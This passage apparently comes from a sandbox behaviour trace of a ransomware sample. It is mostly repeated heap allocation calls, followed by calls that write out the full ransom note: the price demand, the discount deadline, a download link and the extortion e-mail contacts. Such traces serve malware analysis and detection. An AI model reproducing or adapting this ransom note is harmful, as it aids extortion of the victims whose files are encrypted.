lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.801] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.806] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.807] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.808] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.808] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.808] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.808] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0209.808] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.808] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.808] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.808] PathFindFileNameW (pszPath="") returned="" [0209.808] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.808] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.809] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.809] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.809] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.809] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.809] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.809] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.809] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.809] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0209.811] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.811] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.811] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck 